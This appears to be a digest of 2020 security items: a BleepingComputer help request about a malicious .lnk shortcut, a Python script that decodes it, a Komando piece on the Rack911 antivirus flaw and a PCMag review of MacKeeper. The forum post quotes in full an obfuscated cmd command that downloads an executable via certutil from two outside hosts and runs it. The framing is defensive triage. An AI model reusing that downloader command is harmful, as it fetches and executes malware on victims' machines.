.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder. I ran scans with malwarebytes, Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…
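
As an added triage aid (not part of the original post), the sketch below statically resolves the `SET` variables and `!NAME!` references in the shortcut target quoted above, then reports any `certutil -urlcache` download and whether the downloaded file is subsequently run. It assumes a simplified model: variables are substituted repeatedly until nothing changes, which is not cmd.exe's exact evaluation order, and `%NAME%` environment variables are left unexpanded; the function and field names are hypothetical.

```python
import re

# Shortcut target copied verbatim from the post above.
LNK_TARGET = (
    r'%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_'
    r'%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47='
    r'certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!'
    r'||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1'
)

MAX_PASSES = 8  # bound re-expansion so self-referencing variables cannot loop

# "SET NAME=value" up to the next command separator (& or |).
SET_RE = re.compile(r'\bSET\s+(\w+)=([^&|]*)&?', re.I)
# Delayed-expansion reference, e.g. !H!
VAR_RE = re.compile(r'!(\w+)!')
# certutil used as a downloader: -urlcache [flags] <url> <output file>
CERTUTIL_RE = re.compile(
    r'certutil(?:\.exe)?\s+-urlcache\s+(?:-\w+\s+)*'
    r'(https?://[^\s"&|]+)\s+("[^"]+"|[^\s&|)]+)', re.I)


def expand(text, variables):
    """Substitute !NAME! references until the text stops changing."""
    for _ in range(MAX_PASSES):
        new = VAR_RE.sub(
            lambda m: variables.get(m.group(1).upper(), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def triage_lnk_target(target):
    """Return the variables, expanded command line and download findings."""
    # Everything after the first /c is the command string handed to cmd.exe.
    body = re.split(r'/c', target, maxsplit=1, flags=re.I)[-1]
    # cmd variable names are case-insensitive, so normalise to upper case.
    variables = {m.group(1).upper(): m.group(2) for m in SET_RE.finditer(body)}
    # Drop the SET statements and expand what is left.
    expanded = expand(SET_RE.sub('', body), variables)
    downloads = [{'url': url, 'outfile': out}
                 for url, out in CERTUTIL_RE.findall(expanded)]
    # A download is "executed" if its output file also appears as a command.
    executed = sorted({
        d['outfile'] for d in downloads
        if re.search(r'[&|(]\s*' + re.escape(d['outfile']) + r'\s*(?:[&|)]|$)',
                     expanded)
    })
    return {'variables': variables, 'expanded': expanded,
            'downloads': downloads, 'executed': executed}


if __name__ == '__main__':
    report = triage_lnk_target(LNK_TARGET)
    print(report['expanded'])
    for d in report['downloads']:
        print('download:', d['url'], '->', d['outfile'])
    print('executed after download:', report['executed'])
```

The output names what to check on the host: a file called after the logged-in user with an `.exe` extension in the shortcut's start-in directory, and contact with either of the two hosts in DNS or proxy logs.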

28 antivirus programs are vulnerable to hacker hijacking. How to fix it. - Komando


Posted: 04 May 2020 05:06 PM PDT

No matter what kind of system you're using, a strong antivirus program is essential for keeping dangerous malware at bay. Without one, your computer can fall to all sorts of nasty attacks — including hacks that can steal your money or personal data.

Antivirus and antimalware programs work by scanning your computer for hostile files you may have been exposed to or downloaded accidentally. And these days, with so many scammers altering files to carry a malware payload, frequent scanning is more essential than ever.

But what happens when malware attacks your antivirus program itself? This sounds like a nightmare scenario, but it's closer to reality than you think. A critical flaw has been discovered in some of the most popular antimalware programs on the web, and if it's exploited, hackers can turn your defenses against you and delete your system files!

Who watches the watchmen?

Security researchers at Rack911 have confirmed a critical flaw found in 28 of the most popular antimalware programs on the market. If exploited, the antimalware program itself can be infected and hijacked, which can let hackers scan your computer and delete ordinary system files as if they were malware.

Taken to its logical conclusion, this plan of attack can absolutely devastate an infected computer. Researchers note that hackers using the exploit could delete virus definitions and render the antimalware program ineffective. Alternatively, they could delete essential operating system files — which could prevent a computer from booting.

The attack cannot be remote-controlled, but it can be initiated via a malware payload that hackers trick their victim into downloading. Once the malware is installed, it can rewrite the names of important system files to match its own. Then, the antimalware would catch the file and delete it along with the system file.

The result: a "bricked" computer. Worst of all, because this flaw targets antimalware programs, the issue isn't limited by the operating system. Computers running Windows 10, Linux and macOS are all at risk for this hack!

What can I do to protect myself? Do I need new antivirus software?

Because the issue is so serious, many of the biggest players in the cybersecurity world have already patched their software to remove the exploit. You can see the complete list of affected software below, as well as whether or not the patch is available.

If the program is patched, update your software as soon as possible. You can usually find the option to search for updates under the settings or preferences menu of your antivirus software.

  • Avast: Avast Free Antivirus 
  • AVG: AVG AntiVirus for Mac. Patched.
  • Avira: Avira Free Antivirus for Windows. Patched.
  • Bitdefender: Bitdefender Total Security for Mac. Patched; Bitdefender GravityZone for Windows, Linux and Enterprise. Patched.
  • Comodo: Comodo Endpoint Security For Windows, Linux and Enterprise. Patched.
  • ESET: ESET Cyber Security for Mac. Patched; ESET File Server Security for Linux and Enterprise. Patched.
  • F-Secure: F-Secure Computer Protection for Windows and Enterprise. Patched; F-Secure Linux Security for Linux and Enterprise. Patched.
  • FireEye: FireEye Endpoint Security for Windows and Enterprise
  • Kaspersky: Kaspersky Internet Security for Mac. Patched; Kaspersky Endpoint Security for Windows, Linux and Enterprise. Patched.
  • Malwarebytes: Malwarebytes for Windows. Patch incoming.
  • McAfee: McAfee Total Protection for Mac; McAfee Endpoint Security for Windows and Enterprise; McAfee Endpoint Security for Linux and Enterprise. Patched.
  • Microsoft: Microsoft Defender for Mac and Enterprise. Patched.
  • Norton: Norton Security for Mac. Patched.
  • Panda: Panda Dome for Windows
  • Sophos: Sophos Home for Mac. Patched; Sophos Intercept X for Windows and Enterprise. Patched; Sophos Antivirus for Linux and Enterprise. Patched.
  • Webroot: Webroot SecureAnywhere for Windows and Mac. Patched.

As you can see, the only major holdouts at the moment are Avast, FireEye, Malwarebytes, and Panda. Malwarebytes notes that it has a patch on the way, so expect the update to be pushed in the near future.

Interestingly enough, Microsoft's own Windows Defender products for Windows 10 are not affected by this issue. Microsoft told Tomsguide that none of its antimalware products are "currently vulnerable to the methods discussed in this research."

If you're concerned about the threat of malware and own a PC, stick to Windows Defender for now. It's already extremely robust, and thanks to Microsoft's statement, we now know it won't accidentally change virus definitions or delete critical system files.

The only thing Windows Defender has to worry about, it seems, are updates from Microsoft itself.

If you're not using Windows, or rely on a different antimalware program, make sure to update your software to the latest edition if a patch is available. Otherwise, you'll need to switch and download new antimalware software that will scan your system without the risk.

Fortunately, there are plenty of excellent options to choose from.

Until the flaw is completely eliminated, avoid downloading any files you're not 100% sure about. Avoid opening emails from unknown senders, and try to shy away from downloading movies or TV shows illegally. This is the biggest threat vector for malware at this time.

If you play it safe, you might not even need to run a system scan more than occasionally. That's the beauty of the web: It's only as dangerous as you allow it to be.

MacKeeper - Review 2020 - PCMag UK

Posted: 19 May 2020 01:43 PM PDT

By now, most Mac users have realized that their precious devices aren't immune to malware attack. Oh, they make a tougher target than a Windows box, but attacks do get through, so installing a Mac antivirus is important. Given that the attack surface is rather smaller than for Windows, though, it's nice when your security product goes beyond malware protection. MacKeeper includes a host of features related to security, privacy, and performance. It's expensive, though, and lacks some features we've come to expect in antivirus products, regardless of platform.

MacKeeper's main window features a menu down the left side, divided into Cleaning, Performance, Security, and Privacy items. On the right side is a built-in chat support system. The Find & Fix option, selected by default, features a big button to launch a scan at center bottom, and a diagram of things that will be (or have been) scanned occupying most of the screen. It's a bit busy, but it's easy enough to navigate.


MacKeeper Main Window

A Checkered Past

If you're a long-time follower of Mac security, you may be familiar with MacKeeper, and not in a good way. Some years ago, the company had a reputation as scareware, meaning that its free version reported fake problems to scare users into paying for a fix. In 2014, the company was involved in a lawsuit over these behaviors, and behaviors of their out-of-control affiliates.

More recently, though, MacKeeper has aimed to shed that rough reputation. The company, now called Clario, sought and obtained certification from AppEsteem, a site devoted to eliminating deceptive practices by apps of various types. MacKeeper's press release notes that this certification is "something that none of the leading brands in the market have achieved." That statement is itself just a bit deceptive, because, as AppEsteem's CEO confirmed, brands that have never been accused of deceptive practices don't have any need for the certification. Still, MacKeeper does seem to have reined in those rogue affiliates and cleared away any tinge of scareware behavior.

You can still find traces of the old MacKeeper. When I wanted to determine whether the product had scheduled antivirus scanning, I tried to check the help system. However, choosing MacKeeper Help received the terse response, "Help isn't available for MacKeeper." A simple Google search turned up a help page devoted to the old version, using the old company name, Kromtech, with advice not at all relevant to the current MacKeeper. I'm sure they'll sort this out, but it's a bit jumbled at present.

Pricing and OS Support

Any way you slice it, MacKeeper is expensive. If you choose to pay for it on a monthly basis, it's $14.95 per month, or a whopping $179.40 per year. Choosing to pay for a year at a time gets that down to $9.95 per month, which is $119.40 per year. Admittedly, the product is frequently discounted. As of this writing, the discounted yearly price is $74.52.

Airo Antivirus for Mac and Intego are on the pricey side, both at $99.99 per year, but that price gets you three licenses for each. It's true that MacKeeper goes way beyond mere antivirus, including VPN protection, ad blocking, system cleanup, and more. But Norton's Mac product is actually a full-scale cross-platform security suite, and your $99.99 subscription to Norton gets you five suite licenses plus five no-limits VPN licenses. The most common price for a single macOS antivirus license is around $40 per year.

McAfee AntiVirus Plus (for Mac) deserves special mention. It runs $59.99 per year, less than half MacKeeper's price. And with one subscription you can install McAfee protection on all devices in your household, whether they run macOS, Windows, iOS, or Android.

You can, of course, get macOS antivirus protection for no charge at all. Avast, AVG, Avira Free Antivirus for Mac, and Sophos all offer free protection for your Mac. As I'll detail below, Avast and AVG also get perfect scores from two independent labs.

Some macOS security products only work with the newest versions of macOS. For example, Avira, Norton, and Trend Micro require macOS 10.13 (High Sierra) or newer. Others are happy with macOS versions that can charitably be called antique. ProtectWorks and ClamXAV (for Mac) are happy with anything from 10.6 (Snow Leopard) to the present. MacKeeper falls in between; like Bitdefender, it requires at least 10.9 (Mavericks).

Getting Started With MacKeeper

Installing MacKeeper went quickly. I did have to give special permission for MacKeeper to access the sensitive Downloads, Documents, and Desktop folders, but that's normal in macOS Catalina. Right after installation, it invited me to scan the Mac. The scan didn't take long, and it turned up lots of things to fix.

Clicking to fix those problems brought me to a page asking me to shell out cash and purchase the program. I had a license key supplied by the company, but the purchase page didn't provide a place to enter it. I tried using the built-in chat support to find out where to enter that key and had a rather odd experience. The chat agent seemed to think I had somehow stolen the key, and wanted to investigate my purchase. I dropped that conversation and got the information from my helpful Clario contact. With the product activated, I ran the scan again.


MacKeeper Four Part Scan

The scan window displays as four quadrants, Cleaning, Performance, Security, and Privacy. In the Cleaning quadrant, MacKeeper reported it could clean up junk files and application leftovers. For Performance, it reported an out-of-date app and one "useless startup item." In the Security area, I learned the Mac contained no adware or potentially unwanted applications (PUAs).

What surprised me was the recommendation to enable virus protection. How was that not enabled out of the box? My company contact explained, "MacKeeper is mainly a performance and cleaning app." Since the initial scan flags the absent antivirus as a problem to fix, users will get antivirus protection when they choose to fix things, but it still seems odd for a program whose description on the web states that it "blocks malware, viruses, and spyware attacks to protect what matters most—your privacy."

As another test, I downloaded the internationally-supported test file from eicar.org. This is a harmless file that virtually all antivirus vendors agree to detect as a virus, for a kind of sanity check. I downloaded two versions, the basic file and one with a TXT extension. MacKeeper didn't react to the download, or to the Mac opening the text file, but when I scanned the files it identified them as "Virus." I concluded that MacKeeper doesn't use on-access scanning.

Interestingly, the separate Adware Cleaner component does come enabled out of the box. The scan also pointed out a need to install the Private Connection VPN and add MacKeeper's AdStop extensions to Safari and Chrome. Note that the browser extensions strictly block ads. MacKeeper doesn't attempt to divert the browser from malware-hosting sites, or fraudulent (phishing) sites the way Bitdefender, Kaspersky Internet Security for Mac, Norton, and most competing products do. Nor does it mark up dangerous links in search results.

Scans and Malware

I couldn't tell how long the antivirus scan took when it was part of the four-part scan mentioned above, so I ran a scan separately. It finished in six minutes, the fastest of any recent product besides Webroot SecureAnywhere Antivirus (for Mac), which did the job in less than three minutes.

Of course, different products may define a full scan differently. ESET required over 90 minutes for a full scan, and Sophos Home Free (for Mac) well over two hours. We just don't know what they spent that extra time doing.

I don't have a collection of macOS malware for testing, but most Mac antivirus products do their best to wipe out any Windows malware they encounter. When I scanned a USB drive containing my current collection of Windows malware samples, MacKeeper quickly wiped out 83 percent of them. That's decent, but quite a few products have done better. Webroot wiped out 100 percent of the Windows malware samples, and ESET Cyber Security (for Mac) eliminated 93 percent.


MacKeeper Caught Windows Malware

I looked for the ability to schedule a scan, but didn't find it at first. After some digging, I found it in settings. MacKeeper runs a scan every 24 hours. There's no option to change the schedule for that regular scan. All you can do is turn it on or off. I appreciate that it's on by default.

No Help From the Labs

When I evaluate Windows antivirus products, I perform hands-on tests using a collection of real-world malware samples that I curate and analyze myself. I use several hand-coded utilities to aid in my testing. And all that goes out the window when my testing happens on a Mac. My programs don't run on a Mac, and I have no similar collection of macOS-focused malware. Thus, results from the independent testing labs become very important.


Lab Test Results Chart - MacKeeper

As you can see, MacKeeper doesn't show up in the test results from either of the labs that report on Mac antivirus tools. Several other products likewise don't show up, ESET, McAfee, Sophos, and Vipre Advanced Security (for Mac) among them. Those four at least did appear in one or more past tests. MacKeeper is just absent, leaving me with no easy way to determine its efficacy.

At the other end of the lab score scale we find Avast, AVG, Bitdefender Antivirus for Mac, Kaspersky, and Trend Micro Antivirus for Mac. These four accomplished 100 percent detection in testing by AV-Comparatives and 18 of 18 possible points in tests from AV-Test Institute. With perfect scores from two labs, you can be sure these are effective.

Bonus Features for Security and Privacy

As I noted earlier, MacKeeper can install the StopAd ad-blocking extension in Chrome and Safari. It also includes an Adware Cleaner, separate from the antivirus. But the security and privacy bonuses don't stop there.

Track My Mac

Track My Mac isn't installed by default. When you enable this feature, it provides basic antitheft features. Initially, only location tracking is enabled, allowing you to find the device by logging in to your MacKeeper account online. In testing, I found that its location tracking wasn't accurate. I don't mean it got the wrong block—I mean it put my Mac on the other side of the city, 10 miles away.

You can also configure Track My Mac to take a snapshot of anybody who enters the wrong password trying to log into your Mac. By default, it snaps on every error, but you can set it to wait for the second, fifth, or tenth failed attempt. Photos are available both on your device and online.


MacKeeper Location Tracking

This tool also lets you configure a keystroke to quickly invoke the Mac's lockscreen. I'm not sure why that's necessary, given that you can just press Control+Command+Q.

ID Theft Guard

Has your email account been exposed in a data breach? You can find out by entering it in the ID Theft Guard scanner. You can't just enter any address, though. To invoke the scanner, you must enter a confirmation code sent to that address.

Once I saw the scan results, I realized why that confirmation is required. You not only get a list of breached accounts, you get the option to view the exposed password. It wouldn't do to let users get those passwords for accounts they don't own. I've encountered breach-checking tools before, but I don't recall seeing one that displayed the exposed passwords.

Naturally, you'll want to change those now-public passwords. As you do, you can mark each as secured in the app. And once you've cleared up all the existing problems, you can set MacKeeper to monitor the email address for any future breaches.

Private Connect VPN

Impressively, MacKeeper comes with an integrated VPN. When you connect to the internet through the VPN, all your communications travel through an encrypted channel to the selected VPN server. That keeps anyone, even the owner of the network you're using, from snooping on your web traffic.

In addition, your internet requests seem to come from the server, not from your own IP address. This hides you from trackers trying to get your location, and can even let you access content that's not available in your country.

Looking at the list of available servers, I was a bit confused at first. I saw a bunch of US locations near me in the Pacific Northwest, then one in Canada, then more US, then Mexico, and so on. I realized after a moment that the list is ordered by distance from my current location. I'd like an option to order the list by country, alphabetically. How am I supposed to know whether Colombia or Ireland is closer to my location?

In all, MacKeeper offers 60 server locations in 36 countries. These include locations in Africa and South America, regions often underserved by VPN networks. Servers are also available in several VPN-unfriendly countries, among them China, Russia, and Turkey.


MacKeeper Private Connect VPN

My company contact confirmed that MacKeeper licenses the server network from "a major player in the VPN space," but that MacKeeper is "contractually not allowed to disclose which." I scrolled through the near-endless list of third-party credits without finding a clue. I did learn that Private Connect uses the OpenVPN protocol, which we consider the best choice.

Private Connect is Mac-only, and not available separately from MacKeeper, so you won't find a review of it as a standalone product. I can report that it's very simple to use. Just pick your server (or let the VPN pick) and turn it on. There are no other settings. You won't find advanced options like kill switch or split tunneling. But then, most users don't understand or need those. VPN protection is a nice addition to MacKeeper.

Update Tracker

MacKeeper categorizes the Update Tracker component as a performance enhancer, but I consider it just as much a security tool. Malware coders constantly seek security holes in macOS and popular programs, and security researchers constantly create and release patches for those holes. If you don't apply all available security patches, you risk having your Mac compromised.

MacKeeper runs the update check as part of its big four-part scan, and it automatically installs any needed updates when you choose to fix found problems. You can also run the update scan separately. There's an option to exempt specific programs from updates, but I can't think of a good reason to do that.

Performance Features

MacKeeper goes beyond security with a collection of features aimed at improving Mac performance. I've already mentioned the Update Tracker as protecting security. It also keeps your apps running at their best, using the latest updates.

The Memory Cleaner promises to enhance performance by freeing up any RAM that's not actively in use. You can click for a quick cleanup, view details of memory usage, or see just how much memory each app is using. I do wonder how necessary this is, in the modern world of powerful processors and plentiful memory.


MacKeeper Memory Cleaner

Go for a Login Items scan to see just what processes launch every time you boot up your Mac. MacKeeper identifies any that it finds "useless" and automatically disables them. You can manually disable any that aren't locked by the system. This kind of startup management feature is common in Windows security products, less so in those aimed at macOS.

Cleaning Features

System cleanup doesn't relate to security except insofar as it cleans up traces of your computer and internet usage, but it's a common addition to security suites for Windows. MacKeeper helps keep your Mac free of useless files in several ways.

As the name suggests, Safe Cleanup aims to get rid of junk files and only junk files. Running it shouldn't ever remove anything important. As with many of this product's features, it runs automatically during a full system scan, but you can also launch it at will.

The Duplicates Finder requires a bit more finesse. There's no need to keep multiple copies of the same data files, but when you clean up, you need to make sure you leave the single remaining copy in the correct location. MacKeeper promises to keep the originals and delete only copies, but I would review its proposed actions before proceeding.


MacKeeper Duplicates Finder

On my test Mac, the scan found 49 sets of duplicates, most of them script files. I am impressed that it found pairs of identical screenshots taken at different times—that means it's comparing content, not just filenames. Norton 360 Deluxe (for Mac) also scans for duplicates, and even reports similar files such as 720p and 1080p versions of the same movie.

Uninstalling files from a Mac isn't always simple. For some apps, you simply drag from the Finder to the trash. Others require use of a dedicated uninstaller. And you can't always be sure you eliminated every trace of a program. Smart Uninstaller helps with this problem. You start by scanning for apps that can be uninstalled. When you choose one for removal, MacKeeper carefully removes all traces.

Premium Services

There's one item from the left-rail menu that I haven't mentioned, and that's Premium Services. When you invoke this item, you're invited to run a free system checkup in conjunction with a live chat agent. Going forward, you can use Premium Services to solve absolutely any tech problem, on any device.

With a Premium Services subscription, you can get support 24/7, with unlimited support calls, on any tech topic, including tuning your Mac to the max, support for any app, and help setting up new devices. The Premium Services page online touts a wild variety of problems they've solved, from getting a voice-controlled microwave working to configuring a computerized embroidery machine.

The catch? It's super-expensive, at $696 per year or $68 per month. McAfee's similar Concierge Techmaster Gold offers a similar service and goes for $179.95 per year. The Ultimate Services Bundle from Trend Micro costs about the same, and comes with a five-license subscription to Trend Micro Maximum Security, which alone would list for $89.95 per year.

Other security companies offer premium support options at higher or lower levels, but all for quite a bit less than MacKeeper asks.

Go With a Proven Winner

MacKeeper offers tons of security, privacy, and performance features beyond basic antivirus protection. However, it lacks expected features such as blocking access to malicious and fraudulent URLs, and it has no lab reports to back up its promised malware-fighting abilities. On top of that, it costs more than products with a proven track record—a lot more.

We've identified three products that merit our Editors' Choice honor in the realm of Mac antivirus: Bitdefender Antivirus for Mac, Kaspersky Internet Security for Mac, and Norton 360 Deluxe (for Mac). Bitdefender and Kaspersky earned perfect scores from two labs, as did Norton from the one lab that tested it. All three offer a broad range of features, not just antivirus. All three also cost significantly less than MacKeeper.

MacKeeper Specs

On-Demand Malware Scan: Yes
On-Access Malware Scan: No
Website Rating: No
Malicious URL Blocking: No
Phishing Protection: No
Behavior-Based Detection: No
Vulnerability Scan: Yes
Firewall: No
